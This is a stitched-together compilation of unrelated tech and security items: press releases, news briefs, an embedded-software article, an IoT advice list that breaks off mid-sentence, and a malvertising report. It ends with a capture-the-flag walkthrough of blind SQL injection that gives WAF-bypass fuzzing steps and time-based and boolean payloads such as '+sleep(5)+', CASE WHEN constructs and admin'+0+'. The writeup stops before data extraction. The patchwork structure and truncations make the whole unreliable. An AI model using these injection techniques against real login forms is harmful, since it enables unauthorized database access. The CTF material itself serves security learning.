The U.K., Canada, and New Zealand have all signed on, along with leadership from Microsoft, Google, IBM, and HP. It is reported that the United States is in ‘talks’ and has not yet signed onto the initiative. We should all hope that China and Russia join in this effort too. What is important is that the call has been made and it has early success. I’m hopeful that this is the start of more collaboration and ultimately a safer cyber environment for working, living and playing in cyberspace. Incredible changes for good often take time and may never be entirely reached, but they always start with the call for moving together towards a dream with the goal of perfection. It is time for us to start this journey, globally and together.


Axiado’s Processor Architecture Without Meltdown & Spectre Vulnerabilitie ...


SAN JOSE, Calif. (BUSINESS WIRE) -- Axiado today announces a deterministic in-order protocol for its firewall processor architecture, delivering high performance without compromising security.



Current high-performance processor architectures use out-of-order processing, exposing digital systems to critical hardware vulnerabilities like Meltdown and Spectre. After-the-fact patches to those vulnerabilities significantly diminish processor performance. Axiado's firewall processor architecture does not have a performance downside from in-order processing due to its efficiencies of intercore- and interprocessor-communication.

Out-of-order processing was introduced in the late 1990s as a response to market expectations of continuous performance enhancement. While offering a potential performance gain of up to 15 percent, out-of-order processing and related predictive execution (speculative branching, speculative caching, and cache dumping by OS debugger) left systems vulnerable to cyberattacks.

"In totality, our processor outperforms existing processors that use out-of-order protocol because our OS makes a better use of all cores and accelerators that take care of most computationally intensive programs and subroutines," said Axel Kloth, founder and CTO of Axiado.

According to John Gustafson, inventor of Gustafson's Law of Parallel Speed-Up, former Director of Research at Intel Labs, and Senior Fellow of AMD, "A lot of companies have discovered that things like out-of-order execution, and all these other tricks that processor companies have done to improve performance, are full of holes and allow people to penetrate and abuse the systems." Attempts to remedy these vulnerabilities by software patching diminish processor performance, resulting in incomplete security and zero gain in processor performance.

Nick Tredennick, developer of Motorola's MC68000, AMD's Nx686, and IBM's Micro/370 processors, affirmed, "Out-of-order execution within the current CPUs requires speculative execution, speculative branching, and speculative caching. These caching and aging algorithms are very complex and highly prone to error, causing high latency for cleanups. An in-order processor does not have this challenge, and the remaining issue of per-core performance can be mitigated using other methods."

"The most valuable thing that a company can do is to protect individuals and make sure that their sensitive information is not exposed on the internet," said Ashok Babbar, CEO of Axiado. "Our response to the need for uncompromised security is a processor architecture that employs in-order processing that is immune to the vulnerabilities of all other processors today without giving up high performance. Our processor architecture has been specifically designed to protect itself and other processors from known and unknown cyberattacks at the first point of intrusion. We believe this technology is invaluable to network systems companies who want to deliver impenetrable firewalls with high performance to their customers."

See more about Axiado’s high-performance in-order processing at https://axiado.com/hpiop/

About Axiado

Axiado is a firewall processor company securing the digital infrastructure At the 1st Point of Intrusion™. By architecting both the computational and networking stacks, the company has developed the most advanced security platform from the ground up. Axiado's security platform, comprising a secure microprocessor, firmware, OS kernel and APIs, is free from the attack surfaces that other processors and operating systems exhibit today.

Press kit available at https://axiado.com/press/

Discover more at https://axiado.com and follow us on Twitter at security@axiado.corp.

Axiado™ and the Axiado logo are trademarks of Axiado Corporation.

Contacts

Minna Holopainen, VP Communication
Axiado Corporation
minna.holopainen@axiado.com

Bare Metal Programming


As the need for safety and security grows across application areas such as automotive, industrial, and in the cloud, the semiconductor industry is searching for the best ways to protect these systems. The big question is whether it is better to build security and safety into hardware, into software, or both.

In the early days of embedded systems development, software was rather minimal, and often something of an afterthought, said Colin Walls, embedded software technologist at Mentor, a Siemens Business. "Commonly, it was developed by the same engineer(s) who had designed the hardware, and naturally their code interacted very closely with the electronics. They understood all the nuances of the hardware's behavior, so it was not seen as a particular challenge."

As systems became more sophisticated, software specialists began to get involved. These specialists tended to be engineers with a significant knowledge and understanding of hardware, so they were quite happy programming close to the hardware. But rising complexity has made this much more difficult.

“As complexity increased, the single software engineer became a team,” Walls said. “Different team members would have different types of expertise. Those with good hardware knowledge would encapsulate that expertise in software modules, which provided a clean interface and concealed the complexity of hardware interaction. These modules were termed drivers.”

With increasingly powerful microprocessors/microcontrollers and larger memories, the need for a rational program structure drove the adoption of real-time operating systems (RTOSes) that enabled the use of a multi-tasking model. It was a natural progression for the drivers to become part of the RTOS.



Fig. 1: Software stack. Source: Mentor

Bare metal software

When developing an embedded system, an early decision to make is whether to employ an RTOS or not. Many engineers give this very little thought because they are used to coding on top of an operating system. But an RTOS is itself code written on the bare metal, and whether to use one is an important choice for design teams.

The simplest structure for an embedded application is an infinite loop―do something, do something else, do something else, then repeat.

“This simplicity has real value, as the behavior of the code is quite predictable,” Walls said. “The issue is that each part of the code is dependent on other parts of the code for its opportunity to run. This becomes a problem if the code is modified/updated and the equilibrium thus disturbed. The code structure does not scale. The (perhaps obvious) way to restructure the software to reduce the interdependency is to unload some of the hardware responsive code into interrupt service routines (ISRs). The ISRs should be small and fast, primarily concerned with queueing up work to be done in the main loop. This structure is more scalable, but still ultimately depends on all the application code being ‘well behaved.'”
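The restructuring Walls describes, with small, fast ISRs that only queue work for the main loop, is language-agnostic; here is a minimal simulation of the pattern in Python (the UART event name and payloads are invented).

```python
# Simulated ISR-plus-queue structure: the ISR records what happened and
# returns immediately; the main loop drains the queue and does the slow work.
from collections import deque

work_queue = deque()

def uart_isr(byte):
    """Interrupt service routine: queue the event, nothing more."""
    work_queue.append(("uart_rx", byte))

def main_loop(iterations):
    """The embedded version would loop forever; we bound it to simulate."""
    handled = []
    for _ in range(iterations):
        while work_queue:                     # drain queued work
            event, payload = work_queue.popleft()
            handled.append((event, payload))  # slow processing lives here
        # ... do something, do something else, repeat ...
    return handled

uart_isr(0x41)  # pretend two interrupts fired between loop passes
uart_isr(0x42)
print(main_loop(3))
```

Because the ISR only appends to the queue, adding or reordering work in the main loop no longer disturbs the timing of interrupt handling, which is exactly the scalability gain over the plain infinite loop.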

Here, the most flexible and scalable program structure is a multi-tasking (multi-threading) model, where each piece of software functionality is coded as an independent program that is allocated CPU time by a scheduler (see Fig. 2). That, in turn, is part of an RTOS.



Fig. 2: Multi-tasking model. Source: Mentor

Increasingly, there is interest in creating SoC monitoring systems that simply ignore things like run control, which is the classic debug of software running on a processor. Instead, they non-intrusively observe a system in real time, without affecting the behavior of the system. Working at the bare metal layer, i.e., exclusive of the operating system, can be an option.

Programming challenges and options

Although the largest proportion of modern embedded software designs are implemented utilizing an OS of some kind, there are a couple of circumstances when doing without―programming on bare metal―may be a reasonable decision. This could include situations where the application is extremely simple and is implemented, perhaps, on a low-end processor. It also could include situations where there is a need to extract every last cycle of CPU power for the application, and the overhead introduced by an OS is unacceptable.

In both cases, thought must be given to possible future enhancements to the software. If further development is likely, starting out with a scalable program structure is a worthwhile investment, Walls said.

There seems to be growing interest in this approach. While programming on bare metal is not mainstream today, a number of companies are kicking the tires for in-life analytics, said Gajinder Panesar, CTO of UltraSoC. The goal is to observe and detect anomalies while a system is running, which is essential in autonomous vehicles if the anomaly can cause a safety-related malfunction.

“There are people moving toward that, to be able to use the metrics or the rich data that bare metal monitors generate, and they want to chew that data and then decide if that’s anomalous or not,” Panesar said. “The next step would be to take that data and say, ‘Ah, this is why it happened. It was because somebody did this seconds earlier, or nanoseconds earlier.’ It’s primarily the safety and high integrity systems, where it will be used for things like making sure the system is performing and functioning as well as expected, and then to make sure the system is continuously behaving.”

This can be extremely useful in both safety and security applications. "Simple cases could be the observation of how a set of things within the system are playing―the orchestration of software and hardware and how that's going," he said. "You can look at this by stepping back a bit and saying, 'The way the system behaves is that this set of things must talk to this other set of things, and there should be this interaction.' If this pattern or tune changes slightly or is off pitch, we can detect that. So we can detect things that should happen but haven't happened, or things that have happened that shouldn't happen. Also, we can watch when things start drifting. If you think about it as a tune or a regular set of things, when there's a blip or when the tune changes, the words are still the same but the tune is different. One example is a stuck pixel for the automotive app, where by observing what's happening in the SoC and the communication between things like a camera input and the memory, we can make a judgment call about whether that camera has got some stuck pixels or not."

This can be done purely in software, but it would require software running in the stack to detect this. The big concern there is latency and the time it takes to detect an anomaly, and software closer to the metal reacts more quickly than software way up in the stack.

"Interestingly, you don't necessarily know what you're looking for to begin with," Panesar said. "You realize that this SoC is going to go into, say, the engine management of a car, and you know the set of accesses or sequences of transactions that should take place, and off you go. But then you realize that it's actually connected to something like a CAN bus or automotive Ethernet, so it hasn't got an interface. And by the way, the other end of the Ethernet there is a user console for infotainment, and why is it accessing the engine management system? Is that sensible? So at runtime, you actually can make sure that only these communications can access any part of the SoC. You can incrementally build this without re-spinning the SoC, without having to change the application software running."

Market drivers

In the automotive world, standards such as ISO 26262 are the gatekeepers. If you don't follow those standards, you can't sell your chip into a specific system.

"That's really where the need for bare metal programming in automotive is coming from today," said Frank Schirrmeister, senior group director for product management and marketing for emulation, FPGA-based prototyping and hardware/software enablement at Cadence. "It stems from the failure rates you see for certain components in the system. If you look into the car, there are certain rates for how often things are allowed to fail. That trickles down into the components underneath―how often they are allowed to fail. And then it's all about the multiplication of the different probabilities. The problem is the more you multiply, the bigger the probability that one of them fails."

Many engineering teams look at the safety-related aspects at the chip level where they examine whether the system will still behave safely if this bit is stuck at a certain level.

"In that context, we also are checking for items that involve the software at that level," Schirrmeister said. "And then it's really bare metal. This is the first layer of contact to the functional safety in the chip through an extension of fault simulation tools, which test to see what the system will do if a certain node is stuck at zero or stuck at one. So in the automotive case, it's all about the ISO 26262-type definitions. Software plays a role in that it runs on a processor at the bare metal level. Then you will want to figure out if the system will go back into a safe state. The main problem there becomes the planning of the fault campaigns, which are the things you really want to test, because you want to test if this particular part of my chip fails, will my system go into the safe state or not?"

And while this needs to be accounted for at the architectural level, or very early in the design process, there are also mechanisms that allow the system to fall back into a safe state. Those are implemented a bit lower down.

“For a software system, you want it to not just crash,” Schirrmeister said. “You want it to get into a safe state, and that’s where the bare metal layer of software may be helpful to basically identify, ‘What happens if this routine fails? Or if the hardware fails at this point I’ll trap into an interrupt routine or what have you.’ And that needs to get the system into a safe, predictable state.”
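The fault-campaign idea Schirrmeister describes can be caricatured in a few lines. The throttle controller, its plausibility check and the safe state below are all invented for illustration; a real campaign runs on fault simulation tooling against the actual netlist.

```python
# Toy fault-injection campaign: force each bit of a sensor reading to a
# stuck-at value and classify how the fault manifests.
def throttle_controller(sensor, stuck_bit=None, stuck_val=None):
    if stuck_bit is not None:  # inject a stuck-at fault into the reading
        sensor = (sensor & ~(1 << stuck_bit)) | (stuck_val << stuck_bit)
    if sensor > 200:           # plausibility check on the 8-bit reading
        return "SAFE_STATE"    # e.g. limp-home mode
    return f"throttle={sensor}"

def run_campaign(sensor=150):
    """Try every bit, both stuck-at values, for a nominal reading."""
    results = {"safe": 0, "masked": 0, "undetected": 0}
    for bit in range(8):
        for val in (0, 1):
            out = throttle_controller(sensor, bit, val)
            if out == "SAFE_STATE":
                results["safe"] += 1        # fault trapped into safe state
            elif out == f"throttle={sensor}":
                results["masked"] += 1      # fault had no visible effect
            else:
                results["undetected"] += 1  # silently wrong output
    return results

print(run_campaign())
```

Most of the injected faults here produce a silently wrong throttle value, which is exactly the kind of gap a planned fault campaign is meant to expose before the safe-state mechanisms are signed off.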

Safety risks and benefits

While the benefits to visibility at the bare metal level is clear, there are valid concerns about providing different levels of access to a chip. Some industry experts wonder if vulnerabilities may be introduced along the way.

This is one area where formal verification can play a vital role, because it can identify potential problems across a complex system that may not be obvious.

"You are looking at the unknown use cases, and most of functional verification is built with use cases," said Sergio Marchese, technical marketing manager at OneSpin Solutions. "I once found a bug in an Arm core. The instruction was being marked as valid, when it was not. The designer, who is, of course, very, very busy, tells me this is a crazy scenario that is not going to happen. 'This is not the recommended use case. It's not something that a normal human being would use, so it's safe. I don't have time to deal with this. I need to fix bugs that are gonna mess up my use cases.' But when it comes to security, let's say this kind of bug leaks. It could potentially lead to a vulnerability, because that's exactly what an adversary is looking for. The adversary is looking not for normal use cases. It's looking for funny things that can compromise the security of the chip. So that's one aspect of it: security. Then I think in terms of problems, and there are two categories. One is security itself, which means, 'Let's say, we'll never build this through genuine mistakes, so to speak, or mistakes that can be at the architecture level, at the implementation level, functional bugs, whatever.' And then there are vulnerabilities perhaps due to malicious mistakes."

Panesar stressed the intention is not to replace conventional security methods. Rather, it is to augment those methods. “The likes of public key encryption, etc., that should all be in place,” he said. “In a typical example, maybe an SoC has been hacked somehow, and someone’s managed to download some crypto mining software. How do you detect that? You can detect this by anomalous CPU loading. You can detect this by knowing or observing. There are a number of ways you can observe CPU utilization, even during idle periods when there’s no activity. Even when a car isn’t moving, this information can be transmitted over a secure channel, maybe an SSH channel, to some supervisor system.”

This approach also works for identifying ransomware. “You have to detect this anomalous activity when the system is potentially idle and get that across to people,” he said. “This data is sent periodically in systems that are always connected. The automotive industry will be doing vehicle-to-vehicle communication, and they’ll always be connected just to make sure that the car hasn’t suddenly broken down and they’ve not heard anything. So this can exploit that connection. You can be periodically sending some sort of heartbeat. And from that you can see all of a sudden a CPU has gone to 90% loading, when actually it’s stuck in a car park.”
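The idle-load heartbeat check described above can be sketched in a few lines. This is an illustrative sketch only; the `Heartbeat` fields, the threshold, and the transport are my assumptions, not part of any real supervisor product (in practice the heartbeat would arrive over the secure channel mentioned above):

```python
from dataclasses import dataclass

@dataclass
class Heartbeat:
    cpu_load: float   # utilization, 0.0 .. 1.0 (assumed field)
    moving: bool      # e.g. derived from vehicle telemetry (assumed field)

def is_anomalous(hb: Heartbeat, idle_threshold: float = 0.2) -> bool:
    """Flag e.g. cryptomining: heavy CPU load while the system should be idle."""
    return (not hb.moving) and hb.cpu_load > idle_threshold

alerts = [is_anomalous(Heartbeat(0.9, False)),   # parked but 90% load -> suspicious
          is_anomalous(Heartbeat(0.05, False)),  # parked and quiet -> fine
          is_anomalous(Heartbeat(0.9, True))]    # driving, load expected -> fine
print(alerts)  # [True, False, False]
```

The supervisor-side rule is deliberately simple; a real deployment would baseline normal idle load per device rather than use a fixed threshold.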

Conclusion

Clearly, there is work yet to be done, and solutions are still evolving, especially in security.

“This area still is much less established,” Marchese said. “How do you trade off the security architecture, so to speak, with power, with area, with complexity, with the extra design and engineering work? Safety, in a sense, is easier because you have a visible adversary. You model your random faults to say, ‘I want to see these types of faults in this type of logic.’ You can quantify it. It’s rather hard work, but at least you know exactly what kind of adversary you are defending against. With security, that’s not the case. You have some known facts, but ultimately the tricky things you don’t know about are the things you want to defend against, so everything becomes more complicated. Even when you add new logic, you need to be careful not to add new vulnerability because with security, things are pretty crazy.”

Bare metal programming may be the ultimate compromise between hardware and software, but it requires a deep understanding of both at the very outset of the design process. So while there are clear benefits, this stuff isn’t easy.

【Daily News】VTech fined $650,000 by FTC for leaking data on millions of children



VTech fined $650,000 by FTC for leaking data on millions of children

The US Federal Trade Commission (FTC) today agreed to a settlement with a maker of children's electronic toys. VTech had collected data on millions of child users but failed to protect that data adequately.

Source: theregister

Windows 7 blue-screens after installing the CPU vulnerability patch; even Safe Mode is inaccessible

Recent reports say that the KB4056894 update Microsoft released for Windows 7 can fail to apply, leaving systems blue-screening with error code 0x000000c4. Various standard repair methods have not worked; for now the only fix is to remove the patch and skip it until Microsoft ships an official correction.

Source: cnbeta

Apple releases security updates for the Spectre CPU flaws

Apple has released security updates to mitigate the impact of the Spectre processor vulnerabilities on Apple devices, covering macOS High Sierra 10.13.2, iOS 11.2.2, and Safari 11.0.2.

Source: bleepingcomputer

Trend Micro: 36 malicious apps posing as security tools found on Google Play

Trend Micro researchers discovered 36 malicious apps on Google Play masquerading as security tools from major vendors. During Google's latest round of app security checks this month, the researchers identified apps with names such as Security Defender, Security Keeper, Smart Security, and Advanced Boost.

Source: securityaffairs

BlackBerry Mobile website infected with Coinhive cryptomining script

Users recently reported that the BlackBerry Mobile website had been infected with the Coinhive cryptomining script, which hijacks visitors' CPU power to mine the virtual currency Monero. A Reddit user spotted the code on the site and disclosed it publicly, noting that only www.blackberrymobile.com, owned by TCL Communication Technology Holdings, was affected.

Source: infosecurity-magazine

AMD caught in the crossfire: Microsoft's KB4056892 patch can brick systems

According to reports on January 8, the KB4056892 security update Microsoft released for Meltdown and Spectre has had adverse effects on some AMD systems, particularly older AMD Athlon 64 machines.

Source: hackernews

New CoffeeMiner attack hijacks devices of public Wi-Fi users to covertly mine Monero

According to reports on January 6, developer Arnau published a proof-of-concept project named CoffeeMiner that demonstrates how attackers can leverage public Wi-Fi networks to mine cryptocurrency.

Source: hackernews

The news items above are sourced from the internet, and copyright remains with their authors. If any infringement is involved, please leave a message and we will address it promptly.


MIIT: more than 14,000 reports of suspected telecom fraud handled in Q3


[TechWeb] November 29 — According to data released by China's Ministry of Industry and Information Technology (MIIT), in the third quarter the ministry monitored and handled roughly 33.97 million network security threats, including malicious network resources, malware, and security vulnerabilities. Multiple ransomware families, including WannaCry and GlobeImposter, remained active, with WannaCry still infecting 6,000 to 14,000 devices per day.

The data show that in Q3, 105 new vulnerabilities were found in industrial control systems, smart devices, and IoT products. More than 2,600 suspected risks were identified on the key industrial internet platforms under continuous monitoring, and 45 vulnerabilities were found in internet-connected industrial control systems, affecting 58 products across multiple brands.

MIIT handled more than 14,000 user reports of suspected telecom fraud, down 4.9% quarter-on-quarter. International-origin fraud calls exceeded 1.94 million, down 3.4%. "Flight rebooking," "frozen bank card," and "shopping-site customer service" scams were the main fraud techniques.

In the same quarter, MIIT spot-checked more than 50.828 million subscriber registration records across 40 mobile virtual network operators, with an overall accuracy rate of 98.2%. A random check of more than 128,000 on-site photos retained for users who signed up since 2017 showed a 95.4% match rate between users and their ID documents.

MIIT advised users to stay alert to telecom fraud, to handle telecom business only through official channels, and to guard against ransomware by applying security patches promptly, closing unnecessary open ports, and backing up important files regularly.

7 Novice Mistakes to Avoid When Adopting Smart Devices for Your Company

$
0
0

Opinions expressed by Entrepreneur contributors are their own.

It typically takes careful planning and execution to be successful when adopting any new technology. Internet-of-Things (IoT) devices are no different. The problem is that some of us typically get too enamored with the technology. We often fail to take into account the realities that our respective companies face.

Hopping on to the IoT bandwagon without planning is a recipe for disaster. A study by Cisco revealed that only 26 percent of surveyed companies were successful with their IoT initiatives. Whether the issue is updating firmware, security vulnerabilities, or simply failing to take user experience into account, it is critical for companies to avoid common novice mistakes when adopting IoT.

Here are seven common pitfalls you should avoid now that IoT devices have infiltrated your office.

1. Don't be cheap.

The market is now flooded with cheap IoT devices. On the upside, these low-cost devices lower the barriers to adoption. On the downside, they can also be security risks. Such devices typically have few security features and minimal active support, leaving them vulnerable to malware and exposing infrastructure to cyberattacks if exploits are found in their software. That means companies need to implement additional solutions in order to maintain control.

“In IoT initiatives, organizations often don't have control over the source and nature of the software and hardware being utilized by smart connected devices,” notes Ruggero Contu, a research director at Gartner. “We expect to see demand for tools and services aimed at improving discovery and asset management, software and hardware security assessment, and penetration testing.”

These solutions can be costly, mind you, which is why Gartner predicts spending on IoT security to reach $3.1 billion in the next three years. Make sure you invest in devices that have essential security features such as user authentication, data protection, and upgradable firmware. Get devices from companies that have active support and development for their products. Take time to identify vendors that could provide you with longer-term support that cover the lifespan of the devices.

Related: 25 Innovative IoT Companies and Products You Need to Know

2. Overlooking alignment with business goals.

You have to know why you’re starting an IoT project. What business goals do you intend to meet? Do you intend to reduce costs, gather more data, or automate processes? Knowing this would make it easier for you to match appropriate IoT solutions for what you seek to improve.

Having a goal in mind also lets you avoid the trap of novelty. Are you installing Nest thermostats because it’s the cool thing to do or are you really keen on reducing energy costs? Just because everyone else is installing these devices doesn’t mean that you should also rush to do the same.

Try to determine how these devices enhance your ability to deliver value to your internal and external customers. Your strategy should also consider extracting as much value from the effort. For example, the data from IoT devices should fuel business intelligence efforts.

3. Overlooking the ongoing need for maintenance.

Each device you integrate with your network is an additional endpoint that needs to be managed and secured. By adopting IoT at your company, you’re likely to see a spike in the number of devices connected to your network.

“As our ownership of smart technology expands, there will become a moment in time when you will no longer have the instant knowledge of the devices in your home or office which could be used to expose critical vulnerabilities, breach your network or steal your identity,” notes Robert Brown, Cloud Management Suite’s director of services.

Bring-your-own-device (BYOD) policies are now the standard for many organizations. These typically increase staff productivity by ensuring that they are connected and productive wherever they are. However, you must anticipate the addition of these devices to your infrastructure and consider them in your strategy.

Evaluate how well-equipped your IT team is to manage additional devices. Invest in the proper tools and technologies that would help them be more efficient in maintaining your infrastructure.

Related: 3 Biggest Cybersecurity Threats Facing Small Businesses Right Now

4. Ignoring security warnings.

Many IoT devices claim to be user-friendly but sometimes this simplicity contributes to vulnerabilities. Many devices are left exposed to attacks just because users haven’t bothered properly configuring them.

Check if you’ve done basic security housekeeping, such as changing the default access to devices' administration panels. Most malware bots target devices that are still using default usernames and passwords. Are your devices running the most up-to-date firmware and software? Patches must also be deployed regularly to ensure that recently addressed vulnerabilities and bugs are fixed.

Staff members’ own devices are also potential security weak points. Make sure you have measures and protocols that ensure that your data and network are secure especially when accessed through these devices.

5. No contingencies.

IoT devices rely on connectivity to function. But what happens when the Wi-Fi or the internet goes out? If you rely on being online all the time, then you’re inviting trouble. Check if your devices have the options to function offline and temporarily store data locally before resyncing to the cloud at a later time. This way, you will still be able to function without any loss of productivity and data even if you lose internet.

“Despite all the advancements in technology, database, hardware, and software downtime are an expected aspect of doing business,” notes Matt Woodward, who serves as VP Digital Transformation at Rand Group. “The only way to mitigate the risk is to prepare and have the right technology in place to monitor, restore, and restart.”

In addition, you may also want to implement redundancies, backups, and failover measures. Cloud backup solutions not only help prevent data loss but also let businesses recover and become operational quickly in the event of downtime. Downtime is costly to any enterprise. If you’re not prepared to invest in these measures at the moment, then reconsider embarking on IoT altogether.

Related: This Cloud-Based Data Service Makes the IoT Less WTF

6. Forcing technology on people.

Success of IoT projects also relies on how well staff can use the technology to achieve results. However, new technologies sometimes get forced on them. It’s important to have people of all levels buy into the effort.

Educate your staff about how these new devices and measures will make them more productive. They must also be involved, or at least consulted, so that you’d be able to create an engaging working environment that truly delivers value for everyone.

Users must also be educated on how to use

Instart Logic Is Now Instart

Rebranding Reflects Corporate Vision for Making Digital Properties Faster, More Appealing and Profitable

PALO ALTO, Calif. (BUSINESS WIRE) Instart, the company helping thousands of leading brands around the world deliver a faster, safer and more profitable digital experience, today announced that it has officially changed its name to Instart. More identifiable and easier to remember, the company’s new name “Instart” is short for Instant Start, and the rebranding initiative is reflective of the company’s ongoing commitment to making digital properties as fast, visually appealing and profitable as possible. Instart’s new URL will be https://www.instart.com .

Thousands of global brands, retailers, and media and publishing firms from around the world, including Edmunds, Hearst, Neiman Marcus and Office Depot, use the Instart Digital Experience Cloud (DX Cloud) to increase performance, reliability, security and customer satisfaction without requiring any changes to their digital applications or infrastructure. Instart provides secure, high-performance and consistent digital experiences to end users while helping global brands improve conversion by up to 30 percent, online retailers drive increased sales of up to 10 percent, and media and publishing firms boost their advertising revenues by as much as 20 percent.

“Our new name is all about the company’s charter, focus and forward-looking vision,” commented Instart Chief Marketing Officer Daniel Druker. “Our passion is helping our clients deliver amazing digital experiences to their customers, which result in improved operations, higher revenue and greater profit for them. The Instart DX Cloud is the fastest, easiest and highest-ROI way for digital-centric companies to improve the performance, reliability and security of their digital applications. Our new name makes sense because we truly deliver the ‘Instant Start’ on the Internet that consumers crave and that digital businesses need to maintain their competitive edge.”

About the Instart DX Cloud

Instart’s global, cloud-based platform connects customers’ cloud, web and mobile applications with consumers’ devices and automatically and dramatically improves performance, consumer experience and security, leading to higher engagement, conversion, revenue and lifetime value.

About Instart

Instart helps thousands of leading brands around the world deliver a faster, safer and more profitable customer experience through its revolutionary digital experience cloud. Instart combines machine learning, application and device awareness, and open APIs with a broad suite of integrated and automated cloud services, including web and mobile application performance optimization, image optimization, digital advertising optimization, tag analytics and control, web application security, DDoS protection, bot management and security, and content delivery. Using Instart, enterprises can provide ultra-fast, visually immersive, amazingly engaging and highly secure experiences on any device to maximize revenue, deliver superior customer experience, and gain competitive advantage. Learn more at https://www.instart.com .

Contacts

Bospar
Ruben Ramirez, 917-699-9083
ruben@bospar.com

iOS malvertising attack hijacks 300 million browser sessions in 48 hours


This month, a large-scale malicious campaign targeting iOS devices hijacked as many as 300 million browser sessions in just 48 hours. Researchers at Confiant observed the attack on November 12 and, after tracking it, report that the threat actor behind the campaign is still active.

Malicious pages

According to the researchers, the threat actors behind malvertising typically inject malicious code into legitimate online ads and web pages. When victims click these pages they are forcibly redirected to malicious sites, most commonly adult content or gift-card scam pages. The landing pages often mimic the Google Play store to appear more legitimate, then coax visitors into handing over information such as email addresses, home addresses, income details, and purchase intentions, which is used for affiliate-marketing fraud or to steal personally identifiable data.

Confiant CTO Jerome Dangu said:

Web sessions can be hijacked without any user interaction. When users are shown a chance to win $1,000, some of them will be fooled. Given how wide the campaign's reach is, even a tiny success rate is extremely profitable for the attackers.

A larger scale

Malvertising campaigns are not uncommon. Back in July, attackers abused the online advertising firm AdsTerra to run malicious campaigns across more than 10,000 compromised websites. This latest attack mainly targeted iOS users in the United States and drew attention because of its sheer scale.

Although Confiant blocked more than 5 million clicks, the company estimates that over 300 million impressions were served to users within 48 hours. By comparison, the largest malvertising campaign of 2017, run by the threat actor Zirconium, hijacked only about 1 billion sessions over the entire year.

Dangu added:

Nearly 60% of Confiant's customers were affected by the attack. Even a conservative 0.1% conversion rate on 300 million affected browser sessions means at least 300,000 victims, each worth several dollars to the attackers. Telemetry suggests the attackers spent roughly $200,000 running the campaign; we estimate they made $1 million in two days.

Behind the attack

Dangu said that dozens of known groups carry out this type of attack, but there is currently no way to determine who is responsible. Confiant first noticed this actor in August, but the campaign's footprint was still small at the time, so little more could be learned about it.

The researchers observed that the attacker's targets include not only the United States but also Australia and New Zealand. The actor remains active and keeps adjusting how the ads are distributed, and is expected to continue abusing programmatic advertising platforms for some time.

A Full Walkthrough of Routine SQL Injection Fuzzing

Preface

This article records the full fuzzing process used to solve a blind SQL injection challenge on the Bugku CTF platform. It is offered as a small snack for fellow researchers, to deepen understanding of fuzzing for web SQL injection.


Walkthrough

1. Visiting the challenge shows a typical login form.


2. Trying admin/123456 returns "wrong password," which confirms that the user admin exists. Some might reach for brute force here, but the challenge calls for SQL injection, so let's follow the intended solution.

3. I wrote a simple fuzzing plugin for Burp. Sending the login request to the plugin for scanning shows that blind injection is present, with payloads of the form '+sleep(5)+'.

4. Fuzzing

(1) From the payload's form we can guess that the challenge filters the comment markers (+ and #).

(2) Fuzz the special characters to see what is filtered.

When a payload contains a filtered character, the server returns a distinctive blocked response.

That response serves as the fuzzing oracle. (Some WAFs are silent: they accept your data but sanitize it internally and return a normal page. Detecting those requires designing the payload differently, a topic for a future article.)

Fuzzing the special characters shows that responses of length 370 were blocked by the WAF. A large number of characters are filtered, in particular the usual bypass building blocks: inline comments, comment markers, space, %0a, %0b, %0d, and %a0. Note especially that the comma is filtered.

(3) Fuzz the keywords: and, or, order, union, for, and others are filtered. The common extraction form mid(xx from xx for xx) is therefore unusable, and since the comma is also filtered, so is mid(xx,1,1).
(4) Fuzz function names and operators. (Since the plugin's scan had not flagged sleep, intuition said functions were not filtered.)

As expected, only functions containing keywords such as or and and were blocked; almost nothing else was. Note that the information_schema table, normally used to enumerate tables, itself contains the keyword or, so we will not be able to use it directly when constructing statements later.

(5) Try extracting data via time-based blind injection.

if(1=1,sleep(5),0)

With commas unavailable, this has to become:

CASE WHEN (1=1) THEN (sleep(5)) ELSE (2) END

But spaces are filtered too, so parentheses must stand in for them (/*!*/, space, tab, %a0, and %0d%0a are all filtered):

(CASE WHEN(1=1)THEN(sleep(1))ELSE(1)END);
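The two rewriting steps above (commas into CASE/WHEN, spaces into parenthesised operands) can be captured in a tiny helper. This is my own sketch, not the writeup's tooling; note that its output still contains the single space MySQL requires between CASE and WHEN, which is exactly the spot the next test attacks:

```python
def defang(cond: str, then: str, els: str) -> str:
    """Rewrite if(cond,then,else) without commas or argument spaces:
    the comma-separated if() becomes CASE/WHEN, and each operand is
    parenthesised so no space is needed around it. The lone space
    between CASE and WHEN remains; the writeup shows the WAF blocks
    every substitute for it, which is what kills the time-based route."""
    return f"CASE WHEN({cond})THEN({then})ELSE({els})END"

print(defang("1=1", "sleep(5)", "0"))
# CASE WHEN(1=1)THEN(sleep(5))ELSE(0)END
```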

Local testing then showed that a parenthesis cannot sit between CASE and WHEN, so I fuzzed that position with every byte from %00 to %ff.
The results confirm it: no delay can be produced (some bytes are blocked outright; others pass the WAF but break the SQL statement). Time-based blind injection is effectively ruled out, which leaves boolean-based blind injection.

(6) Try boolean-based blind injection

Since if and case/when are unavailable, the only logic test left is the query's own boolean comparison (=). For instance, we noticed at the start that the user admin exists. Adapting the plugin's payload '+sleep(5)+' (remember to encode + as %2b):

admin'+1+' (false; encode + as %2b)
admin'+0+' (true; encode + as %2b)

select * from user where name='admin'+1+'' and passwd='123456'; (false) ==> "wrong username"
select * from user where name='admin'+0+'' and passwd='123456'; (true) ==> "wrong password"

This exploits a MySQL quirk; if it is unfamiliar, try this experiment:

select 'admin'='admin'+0 union select 'admin'='admin'+1;

The first comparison yields 1 and the second yields 0: MySQL first evaluates the right-hand expression, coercing it to a number, and then compares it with the string admin on the left, which triggers another coercion, hence the difference between 1 and 0.

That gives us the decision oracle for boolean-based blind injection.
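As a sketch of how that oracle might be driven programmatically (the function names and the server's exact error strings are my assumptions, not the actual challenge responses):

```python
from urllib.parse import quote

def build_payload(condition: str) -> str:
    """Wrap a SQL condition in the admin'-(cond)-' form and URL-encode it.
    The subtraction triggers MySQL's numeric coercion: a true condition
    makes the name expression evaluate to -1 (no such user, so the app
    reports a username error); a false one makes it 0, which the string
    'admin' also coerces to (user found, so a password error instead)."""
    return quote(f"admin'-({condition})-'", safe="")

def oracle(response_text: str) -> bool:
    """The condition held when the app complains about the username."""
    return "wrong username" in response_text

print(build_payload("length(passwd)=32"))
# admin%27-%28length%28passwd%29%3D32%29-%27
```

The writeup's own payloads use this exact admin'-(...)-'' shape; only the wrapper code around them is hypothetical.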

(7) Solve the data-extraction problem

